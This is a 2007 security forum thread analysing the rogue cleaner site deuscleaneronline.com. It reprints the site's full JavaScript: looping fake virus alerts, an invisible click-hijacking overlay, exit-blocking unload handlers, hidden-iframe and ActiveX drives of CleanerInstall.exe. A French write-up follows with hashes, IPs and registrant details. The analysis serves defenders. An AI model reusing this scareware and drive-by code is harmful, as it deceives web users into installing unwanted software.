Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

deucecleaneronline.com

Started by MysteryFCM, Nov 19 2007 04:16 PM

You cannot reply to this topic
Go to first unread post

6 replies to this topic

#1
MysteryFCM

Posted 19 November 2007 - 04:16 PM

Forum Deity

Moderators
4,462 posts

Gender:Male
Location:Tyneside, UK

Details at:

http://msmvps.com/blogs/spywaresucks/archi...19/1335216.aspx

Steven Burn
Research Engineer

#2
MysteryFCM

Posted 19 November 2007 - 11:18 PM

Forum Deity

Moderators
4,462 posts

Gender:Male
Location:Tyneside, UK

Woops, got the domain wrong ..... tis:

deuscleaneronline.com

Steven Burn
Research Engineer

#3
MysteryFCM

Posted 19 November 2007 - 11:31 PM

Forum Deity

Moderators
4,462 posts

Gender:Male
Location:Tyneside, UK

looking at it's source, it's the following that does all the naughty loveliness;

deuscleaneronline.com/common/destrub.js

*****************************************************************
vURL Desktop Edition v0.2.0 Results
Source code for: http://deuscleaneronline.com/common/destrub.js
Server IP: 24.244.171.69
Date: 19 November 2007
Time: 23:21:22:21
*****************************************************************
//alert(h);
//java script:flashClick();

var loading_finished = false;
function loading_done()
{
	//alert(loading_finished);
	loading_finished  = true;
}

function addEvent(element, eventType, functionName) {
 if (element.addEventListener) {
 element.addEventListener(eventType, functionName, false);
 return true;
 } else if (element.attachEvent) {
 var r = element.attachEvent('on' + eventType, functionName);
 return r;
 } else {
 element['on' + eventType] = functionName;
 }
}

/*********************************** Begin of definitions of EventManager ************************************/
/**
* Class for manipulation with document events
*/

/**
* Constructor of EventManager
*
* @param <array> input - array of events, event - array (elementType, elementName, eventType, functionName)
*/
function EventManager(input) {
 this.input = input || [];
 for (var i = 0, j = this.input.length; i < j; i++) {
 this.addEvent(this.input[i][0], this.input[i][1], this.input[i][2], this.input[i][3]);
 }
}

/**
* Add event
*
* @param <string> elementType - type of element for witch created event (aka 'obj', 'id', 'class', 'tag')
* @param <string>/<object> elementName - name of element for witch created event (window, 'download_button')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - function witch was process event
*
* @access - public
*/
EventManager.prototype.addEvent = function(elementType, elementName, eventType, functionName) {
switch (elementType) {
case 'obj':
addEvent(elementName, eventType, functionName);
break;
case 'id':
this.addEventById(elementName, eventType, functionName);
break;
case 'class':
this.addEventByClass(elementName, eventType, functionName);
break;
 case 'tag':
 this.addEventByTag(elementName, eventType, functionName);
 break;
 default:
 break;
 }
}

/**
* Add event by element ID
*
* @param <string> elementId - id of html element for witch created event ('download_button')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - function witch was process event
*
* @access - private
*/
EventManager.prototype.addEventById = function(elementId, eventType, functionName) {
 addEvent(document.getElementById(elementId), eventType, functionName);
}

/**
* Add event by element class
*
* @param <string> className - name of class of html element for witch created event ('download_buttons')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - function witch was process event
*
* @access - private
*/
EventManager.prototype.addEventByClass = function (className, eventType, functionName) {
 elements = getElementsByClass(className);
 for (i = 0, j = elements.length; i < j; i++) {
 addEvent(elements[i], eventType, functionName);
 }
}

/**
* Add event by html tag
*
* @param <string> tagName - name of html tag for witch created event ('span')
* @param <string> eventType - type of event (aka 'click', 'load', 'unload')
* @param <function> functionName - function witch was process event
*
* @access - private
*/
EventManager.prototype.addEventByTag = function (tagName, eventType, functionName) {
 elements = document.getElementsByTagName(tagName);
 for (i = 0, j = elements.length; i < j; i++) {
 addEvent(elements[i], eventType, functionName);
 }
}

//var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
//document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");





//ajax object creation 
var xmlhttp=false;
/*@cc_on @*/
/*@if (@_jscript_version >= 5)
// JScript gives us Conditional compilation, we can cope with old IE versions.
// and security blocked creation of the objects.
try {
  xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
  try {
   xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  } catch (E) {
   xmlhttp = false;
  }
}
@end @*/
if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
xmlhttp=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp = window.createRequest();
} catch (e) {
xmlhttp=false;
}
}





function report_click()
{
 //alert("body click");
 //if(h == 1 && h == 2 ){onClickDownload();}
	
try{	
var location = window.location.href;
var startInd = location.indexOf("/", 8);
var lastInd = location.indexOf("/", startInd + 1);
var lendingNum = location.substr(startInd + 1, lastInd - startInd - 1);

	xmlhttp.open("GET", "http://deuscleaneronline.com/report.php?ag=" + DESTRUB + "&num=" + lendingNum ,true);
	 xmlhttp.onreadystatechange=function() {
	  if (xmlhttp.readyState==4) {
	   var text = xmlhttp.responseText;
		  
	  }
	 }
 xmlhttp.send(null);
 }catch(exc)
 {}

 }
 
var err_msgs = ["Question!\nClose access to all your favorites in Internet.\nPress \"OK\" if you agree","Attention!\nYour PC performance is much slower than needed. Do you want to fix the trouble?","Press \"OK\" for blocking the access to your confidential information.","Attention!\nYour private data are probably available to anybody in Internet.\nPress \"Cancel\" to get it blocked.", "Your private information can be available in Internet.\nPress \"OK\" for protecting of your confident information.","Attention!\nA privacy violation has been detected which can probably expose your credit  cards information for frauds.\nPress \"OK\" for blocking the access to your confidential information. ", "Error!\nAccepss violation at address 004FFB84 in module \'explorer.exe\'. Read of address 00F50D71A4.Press \"OK\" to fix. ", "Attention!\nA serious  threat has been detected in your web browser. Everybody can have access to you most confidential information.\nPress \"OK\"",   "Attention!\nThe internet viruses\' signatures have been detected on your PC.\nPress \"OK\" to remove immediately", "Attention!\nPrivacy violations have been detected on your PC, which can cause the private and confidential information losses.\nPress \"OK\" for immediate repair.", "The detected threats can obviously cause system crash and private information losses. Do you want to fix it now?"];
function destrub()
{	
	
	if(!DESTRUB) return;
	if(confirm("Danger! Your system is seriously exposed.\nIt is highly recommended to clean up the PC immediately."))
	{	
		onClickDownload();
	}else{
	var counter = 0;
	var randomnumber = Math.floor(Math.random()*(err_msgs.length ));
	var mes = err_msgs[randomnumber];
	
	while(!confirm(mes))
	{
		randomnumber = Math.floor(Math.random()*(err_msgs.length ));
		mes = err_msgs[randomnumber];
	
		counter ++;
		if(counter > 24) 
		{
			if(confirm("Attention!\nThe internet viruses\' signatures have been detected on your PC.\nPress \"OK\" to remove immediately"))
			{
				// hm following line must be commented till all the graphic alert popup is clickabke with download result in onclick 
				onClickDownload();
			}
			
			if(navigator.appVersion.indexOf('MSIE') > 0)
				iefinalPanic();
			else 
				start_onclose_panic();
			return;
		}
	}
	onClickDownload();
	} 
}

function activate_onclose_panic()
{
	if(!DESTRUB) return;
	else $('non-closer').style.display ="block";
}
function start_onclose_panic()
{
	$('non-closer').style.display = 'block';
	$('non-closer').style.height = (parseInt(window.screen.height*0.7)  ) + 'px';//'100px';
}
//error stuff loadiframe
// CleanerInstall.exe\	
function iefinalPanic()
{
	var old_h = window.screen.height;
	var old_w = window.screen.width;
	var h = (window.screen.height )/2 - 100;
	var w = (window.screen.width )/2 - 100;
	window.resizeTo(10,10);
	window.moveTo(w,h);
	while(!confirm("If you want to prevent threats for the PC - press \"OK\".\nIf you refuse to check your system, press \"Cancel\", and you agree to be responsible for all the \nsystem malfunctions and private information losses." ));
	download();
	window.moveTo(0,0);
	window.resizeTo(old_w,old_h);
	
}
function final_panic()
{
	var old_h = window.screen.height;
	var old_w = window.screen.width;
	var h = (window.screen.height )/2 - 100;
	var w = (window.screen.width )/2 - 100;
	window.resizeTo(10,10);
	window.moveTo(w,h);
	if(confirm("If you want to prevent threats for the PC - press \"OK\".\nIf you refuse to check your system, press \"Cancel\", and you agree to be responsible for all the \nsystem malfunctions and private information losses." ))
	{
		window.moveTo(0,0);
		window.resizeTo(old_w,old_h);
		//$('down-link').click();
		//var dlink =  "http://deuscleaner.com/download/CleanerInstall.exe";
		download();
		//location.href = dlink;
	}else {
		window.moveTo(0,0);
		window.resizeTo(old_w,old_h);
	}
}

var dlink =  "/download/";
var dlink_exe =  "/download/CleanerInstall.exe";
var downloaded = false;
function nag_download()
{
	if(navigator.appVersion.indexOf('MSIE 6.') > 0)
	{
	//alert('ie6 download');
	try{
		$('iie').launchURL(dlink);
	}catch(exc){
	//alert(exc.message);
	}
	
	}else
	try{
	document.location.href =  dlink;
	}catch(exc){
	//alert(exc.message);
	}

}
	
window.downloading_is_coming = false;
window.onclick_download = true;

function block_exit()
{
	window.ext_desctrub = false;
	setTimeout(function (){  window.ext_desctrub = true; }, 4000);
}
window.download_exit_timeout = null;
window.ext_desctrub	= true;
window.exit_block_counter = 0;
function onClickDownload()
{
	
	//alert('onclicl download done');
	
	//alert(loading_finished + 'setting up:' + window.ext_desctrub);
	//alert(window.ext_desctrub);
	
	/*
	if()
	{
		//alert('ie6 downloads');
		document.location.href = dlink;
	}
	*/
	
	/*
		if(window.download_exit_timeout != null)
		{
			//console.debug("clear timeout " + window.ext_desctrub);
			clearTimeout(window.download_exit_timeout );
		}
		window.download_exit_timeout  = setTimeout(function (){   window.ext_desctrub = true; 
			window.download_exit_timeout = null;
			//console.debug("timeout elapsed " + window.ext_desctrub);
		}, 4000);
	
	window.ext_desctrub = false;
	*/
	
	
	//alert(loading_finished);	
	if(window.onclick_download)
	{ 
		if(window.exit_block_counter == 0)
		window.exit_block_counter += 2;
	else window.exit_block_counter ++;
	//alert(window.exit_block_counter);
	
		window.onclick_download = false;
		setTimeout(function (){window.onclick_download = true; }, 500);
		
	if(navigator.appName.indexOf('Netscape') >= 0 ||(navigator.userAgent.toLowerCase().indexOf("opera") != -1 && loading_finished))
	{
		var element = document.createElement("iframe");
		element.setAttribute("src",dlink);
		element.style.display ="none";
		document.body.appendChild(element);
		//alert("ie6 way done");
		
	}else if((navigator.appVersion.indexOf('MSIE 7') >0 || navigator.appVersion.indexOf('MSIE 6') >0||navigator.appVersion.indexOf('MSIE 5') > 0) && loading_finished){
	//alert(location.href +  );
		document.location.href = dlink;
		}else{
		window.open(dlink, 'somename');
		window.focus();
	}
	
	/**
	added to solve following problem :
	to avoid onunload event need to remove it's hadler and add again after install ilnk is entered
	***/
	}
}
function download()
{
	DESTRUB = false;
	downloaded = true;
	
	if(!!$("non-closer")) 
		$("non-closer").style.display = 'none';
	
	if(navigator.appVersion.indexOf('MSIE 7.') > 0 || navigator.appVersion.indexOf('MSIE 6.') > 0)
	{
		if(navigator.appVersion.indexOf('InfoPath') > 0)
		{
			window.open(dlink,"download","status=1,width=10,height=10");
			window.focus();
		}else{
		
			try {
				$('iie').launchURL(dlink);
			} catch (er) {
				//alert(er + "remove in future (for testing now)");
				window.open(dlink,"download2","status=1,width=10,height=10");
			}
			
			
		}
		
	}else if(navigator.appVersion.indexOf('MSIE 5.') > 0){
		var myWin = window.open(dlink);
		myWin.parent = null;
	}else {	
	//window.location = dlink;
	var element = document.createElement("iframe");
	element.setAttribute("src",dlink);
	element.style.display ="none";
	document.body.appendChild(element);
	}
	
}
//<OBJECT CLASSID="

function add_xx_control_ie5()
{
	document.write('<OBJECT CLASSID="CLSID:3BA4271E-5C1E-48e2-B432-D8BF420DD31D" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; top:-100px;left:-100px;"></OBJECT>');
}
function add_xx_control()
{
	//alert('adding activeX');
	var aElement=document.createElement('div');
	 aElement.innerHTML = '<OBJECT CLASSID="CLSID:3BA4271E-5C1E-48e2-B432-D8BF420DD31D" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; top:-100px;left:-100px;"></OBJECT>';
	 document.body.appendChild(aElement); 
}

function add_xx_control_ie6()
{
	var aElement=document.createElement("div");
	aElement.innerHTML = '<OBJECT CLASSID="CLSID:3BA4271E-5C1E-48e2-B432-D8BF420DD31D" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; top:-100px;left:-100px;"></OBJECT>';
	 document.body.appendChild(aElement); 
}
if(xx == 1 )
	{	
		if(navigator.appVersion.indexOf('MSIE 5.') > 0)
		{
			add_xx_control_ie5();
		}
	
}
	function add_xx_control_ie7()
	{
		//alert('adding cab for ie7');
		//var aElement= 
		var b = '3AA42713-5C1E-48e2-B432-D8BF420DD31D';
		$('cab-cont').innerHTML = '<OBJECT CLASSID="CLSID:'+ b +'" CODEBASE="/CleanerInstall.cab" BORDER="0" HEIGHT="0" WIDTH="0" style="position:absolute; "></OBJECT>';
	}
	
function scan_done(){
	if(xx == 1)
	{	
		if(navigator.appVersion.indexOf('MSIE 6.') > 0 )
			add_xx_control_ie6();
			else if( navigator.appVersion.indexOf('MSIE 7.') > 0)
			{
				add_xx_control_ie7();
			}
	}
}

function ver()
{
if(h == 2)
{

if(navigator.appVersion.indexOf('MSIE 5.') > 0)
	document.body.style.cursor = "hand";
else 
	document.body.style.cursor = "pointer";

}

if(h ==1 || h==2)
{
	//alert('onclick event added');
	$('place-holder').innerHTML = '<div  onclick="onClickDownload()" style="background-color: #FFFFFF; opacity: 0.0;filter: alpha(opacity=0);  position:absolute; width:99%; height:99%; top:0; left:0; " ></div>';
	 
}

}

/*****
if(xx == 1)
	{
		//alert('attaching');
		if(!(navigator.appVersion.indexOf('MSIE 5.') > 0))
		{
			//alert('starting timeout');
			setTimeout(function() {add_xx_control();}, 500 );
		}
	}
*/

// //// // attach onclose question 
//alert(navigator.appName);

function openDangerWindow(adr)
{
	if(inNag) return;
	
	if(navigator.appVersion.indexOf('MSIE 5.') > 0){
	window.open(adr);
	}else if(navigator.appVersion.indexOf('MSIE 6.') > 0){
		//alert('here we are');
		try{
			$('iie').launchURL(adr);
			}catch(ex)
			{
				//alert(ex.message);
				// loading forever !!! block popup ?;) hah hah hah 
			}
			//alert('hello');
	}else{
		//alert('just changing location');
		 location.href = adr;
	}
}

var dangerWindAdr = "/nag/?" + add_url + "&n=nag";
var EventManager = new EventManager();

var exitMessage = "If you want to prevent threats for the PC - press \"OK\".\nIf you refuse to check your system, press \"Cancel\", and you agree to be responsible for all the \nsystem malfunctions and private information losses.";

var exitMessageCancel  = "If you want to prevent threats for the PC - press \"Cancel\".\nIf you refuse to check your system, press \"OK\", and you agree to be responsible for all the \nsystem malfunctions and private information losses.";

if(window.nag){
exitMessage = "Attention!\nA privacy violation has been detected which can probably expose your credit cards information for frauds.\nPress \"OK\" for blocking the access to your confidential information";
exitMessageCancel  = "Attention!\nA privacy violation has been detected which can probably expose your credit cards information for frauds.\nPress \"CANCEL\" for blocking the access to your confidential information";
window.inNag = true;

}else window.inNag = false;

window.onunload_counter = 0;
if(end == 1)
{

if(navigator.appVersion.indexOf('MSIE 7.') > 0 || navigator.appName.indexOf('Netscape') >= 0  )
{
//alert('attaching event');	
 /*window.onunload = function (){ 
 alert(err_msgs[1]);
 }; 
	*/
	window.onbeforeunload = function(){
	
	//alert('unload ' + window.exit_block_counter);
	if(window.exit_block_counter == 0)
	{
		if(inNag){
		//alert(exitMessage);
			onClickDownload();
			return exitMessageCancel;
		}
			//window.location = dlink;
			//
			openDangerWindow(dangerWindAdr + "&install=1");
			if(navigator.appName.indexOf('Netscape') >= 0 )
				download();
			
			window.exit_block_counter --;			
			return exitMessageCancel;
	}
 	window.exit_block_counter --;
	}

}else if(navigator.appVersion.indexOf('MSIE 6.') || (navigator.userAgent.toLowerCase().indexOf("opera") != -1) ) {

function UnloadHandler(){
	//alert(window.ext_desctrub);
	//if(window.ext_desctrub) return false;
	if(inNag){
		alert(exitMessage);
			download();
			return;
	}
	//alert('unload');
	
	if(true /*!downloaded*/)
	{
	 if(confirm(exitMessage)){
		  openDangerWindow(dangerWindAdr+ "&install=1");
		  }
		  else {
		  openDangerWindow(dangerWindAdr);
		  }
	  return false;
	  }
   }


   EventManager.addEvent('obj', window, 'unload', UnloadHandler);
//alert("ie6  way");
}else {

function OnUnloadHandler() { 
if(window.ext_desctrub) return false;
if(inNag)
{
	alert(exitMessage);
	download();
}else
if(!downloaded)
	{
	 
	 if(confirm(exitMessage))
	 {
		//download();
		openDangerWindow(dangerWindAdr + "&install=1");
		
	 }else openDangerWindow(dangerWindAdr);
			
	  
	  }
	  return false;
	}
	EventManager.addEvent('obj', window, 'unload', OnUnloadHandler);
	}
	

}

Drops a 97K file called CleanerInstall.exe. Sandbox results will be at the following once it's done :angry:

)

http://research.sunbelt-software.com/viewm...aspx?id=2290409

Tried uploading to here but received;

Upload failed. The file was larger than the available space

Steven Burn
Research Engineer

#4
Pierre (aka Terdef)

Posted 22 November 2007 - 12:40 AM

New Member

Experts
7 posts

Hi all

Original at http://assiste.forum...p=116961#116961

"Description de DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)
DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online) est un logiciel crapuleux pr�tendant �tre un logiciel de s�curit� de type Nettoyeur de disque (Classe des Anti-traces internes)

Description d�taill�e de DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)
DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online) est un logiciel crapuleux pr�tendant �tre un logiciel de s�curit� de type Nettoyeur de disque (Classe des Anti-traces internes). Il s�implante sur votre machine � votre insu, par un moyen ou par un autre

utilisation d�une faille de s�curit� exploit�e par un site pi�g� : un site Internet sur 62, soit plusieurs centaines de millions de sites Internet, contiennent une attaque de type � Drive-by Download � ( http://assiste.com.f...y_download.html ) qui inscrit de force un ou plusieurs parasites (adware�) dans votre ordinateur tandis que vous croyez naviguer paisiblement sur le Net
t�l�chargement d�un programme pi�g� : un logiciel sur 20 disponible sur le Net contient un ou plusieurs pi�ges (spywares, backdoor, keylogger� voir l�ABC � http://assiste.com.free.fr/p/abc/abc_de_la...r_internet.html )
clic sur un lien pi�ge sugg�r� dans un e-mail, une zone de conversation imm�diate (chat) etc. �
t�l�chargement d�un crack ou d�un hack (100% des hacks et cracks sont des pi�ges)
T�l�chargement de Codecs ou pack de Codecs � la plupart sont pi�g�s
T�l�chargement d�un �conomiseur d��cran ou d�un fond d��cran � la plupart sont pi�g�s
utilisation de la peur avec une publicit� alarmante (fausse alerte de s�curit�) simulant une analyse de votre machine (il s�agit d�une simple image anim�e sans aucune analyse) et pr�tendant y trouver de nombreux parasites ou autres �l�ments tr�s dangereux pour vous
etc. �

Dans tous les cas, il est impossible � l�internaute � normal � de sortir de cette attaque sans que le m�canisme de l�escroquerie ne s�implante.

L�escroquerie vous harc�le alors sans cesse (toutes les 2 minutes) pour vous rappeler de t�l�charger gratuitement l�outil miracle n�cessaire � l�analyse approfondie de votre ordinateur. Une fois ce t�l�chargement fait, seul moyen pour � calmer � le harc�lement dont vous �tes victime, l�outil miracle va confirmer l�analyse bidon et annoncer une liste d�erreurs et parasites imaginaires (� tromperie �) (et, peut-�tre, quelques-uns r�els), inventant ainsi (ou exag�rant) une menace.

Conclusion sur DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)
Ne vous faites pas avoir !
Vous allez d�couvrir que l�outil pr�tendument gratuit n�est qu�une version de d�monstration et que pour pouvoir � �radiquer r�ellement ses inventions � (sic !) il faut payer, tr�s cher, beaucoup plus cher que le prix des produits des t�nors de la s�curit�, cet outil totalement inconnu, trompeur et parfaitement inefficace. C�est une escroquerie, au sens propre du terme, une crapulerie utilisant des m�thodes de vente trompeuses et reposant sur la peur (une forme d�ing�nierie sociale). Ne donnez jamais suite � cette attaque ni � aucune autre de m�me nature.

Pratiquez le Safe-CEX - Safe-Computer EXploitation (Adoptez le bon comportement sur l'Internet)
-> http://assiste.com.f...a/safe_cex.html
Pratiquez la Safe Attitude - Ayez les bons reflexes face � la d�couverte d'un parasite
-> http://assiste.com.free.fr/p/abc/a/reactio...n_parasite.html
Utilisez ce que vous avez entre les oreilles
-> http://assiste.com.free.fr/p/abc/c/antivir...e_attitude.html
Eradiquez syst�matiquement le virus PEBCAK (PELCEC)
-> http://assiste.com.f...cak_pelcec.html
Couvrez-vous avec un kit de s�curit�
-> http://assiste.com.f...t_securite.html
Si vous n�y arrivez pas
-> http://assiste.forum.free.fr

Informations techniques sur DeusCleanerOnline (DeusCleaner; Deus Cleaner; Deus Cleaner Online)

Domaine = deuscleaneronline.com
Machine (host) = 24.244.171.69 ( 6 domaine(s) )

Pr�tend �tre un : Nettoyeur de disque (Classe des Anti-traces internes)

Classe de parasite = WinFixer
Clause de confidentialit� (Privacy) = http://deuscleaner.com/privacy-policy/
Conditions g�n�rales (Terms) = http://deuscleaner.c...and-conditions/
Contrat de licence (EULA) = http://deuscleanerpay.com/license.php" target="_blank">Une clase de licence se trouve sur le domaine de paiement mais n'est pas accessible avant de passer � l'acte d'achat. Cette clause est �galement r�p�t�e au d�but de la proc�dure d'installation mais il n'est pas possible d'en sortir et de rejeter l'installation : http://deuscleanerpay.com/license.php

Image de l'arnaque =
Posted Image

Analyse =
Posted Image

Analyse demand�e en SandBoxing : http://research.sunbelt-software.com/ViewM...aspx?id=2290409
Outgoing connections IP :
85.17.4.104 (HTTP)
64.28.177.250 (HTTP)
212.198.2.51 (DNS)
212.198.0.91 (DNS)

Outgoing connections Domaine :

Registrant pr�tendu = TORS BUISINESS LIMITED - Andreas Ellinas - Suite 2, Portland House, Glacis Road, - Gibraltar - Not Applicable,220174 - GI - Tel. +375.296324764
Registrar = ESTDOMAINS, INC.
Cr�ation = 18 06 2007

T�l�chargement (dangereux - pour chercheurs uniquement) = hxxp://deuscleaneronline.com/download/CleanerInstall.exe

Instalateur pr�tendu (Downloader) = CleanerInstall.exe
MD5 = e034b8bcdc7cfd0fcfc93ccbae26bc30
Sha1 = ea415585f0d0432938cc626cab99ebf51c662eec
CLSID = 87EAB0AB-F838-4EFC-AF41-6B0ADCC794AC

Certificat d�livr� � : Deus Cleaner Inc.
Adresse : hostmaster@deuscleaner.com
Validit� : Du 15/08/07 au 15/08/08
Par : UTN-USERFirst-Object - http://www.usertrust.com - The USERTRUST Network - Salt Lake City - UT - US
Autorit� de certification : COMODO.
UTN-USERFirst-Object est une des certifications de COMODO comme on peut le voir sur
http://www.comodo.co...tory/index.html
et dans le document ""Comodo Certification Practice Statement"" �
http://www.comodo.com/repository/09_22_200...ement_v.3.0.pdf
User Trust Inc ( http://www.usertrust.com ) a �t� acquis par COMODO depuis d�cembre 2004 ( http://www.prleap.com/pr/2534/ ).
Contre-signature : Aucune (none)

Probable op�rateur = TORS BUISINESS LIMITED - Andreas Ellinas ? Peut-�tre un ind�pendant dans la mouvance du groupe V�rio ou se servant de leur moyens logistiques (m�me attaque WinFixer, m�me logistique de paiement, m�me clause de licence, m�me attaque etc. ...)
Complice financier = https://secure.deusp...t.com/payment/? et https://secure.deusc...ay.com/payment/? : Le ""drive-by download"" ( http://assiste.com.f...y_download.html ) �tant de la classe WinFixer et ces deux sites de paiement �tant exactement identiques � celui du groupe Verio, on pense qu'il s'agit de DEDICATED PAYMENT SOLUTIONS LTD. - 10 COPTIC STREET, LONDON, WC1A 1NH

Le domaine est juridiquement et fiscalement sur une zone off-shore :
Le site est propri�t� et op�r� par VERIO PRODUCTIONS LIMITED, AVENUE HOUSE, ST JULIAN'S AVENUE, ST PETER PORT, GUERNSEY GY1 1WA<br >Toutes les transactions financi�res sont ex�cut�es par VERIO PRODUCTIONS LIMITED, AVENUE HOUSE, ST JULIAN'S AVENUE, ST PETER PORT, GUERNSEY GY1 1WA

Cette fiche sera ajout� � la Crapth�que ( http://assiste.com.f...craptheque.html )
Sous le nom de http://assiste.com.free.fr/p/craptheque/de...aneronline.html lors de sa prochaine mise � jour.

Pierre (aka Terdef)
ASAP Admin - SWI Ambassador - Assiste.com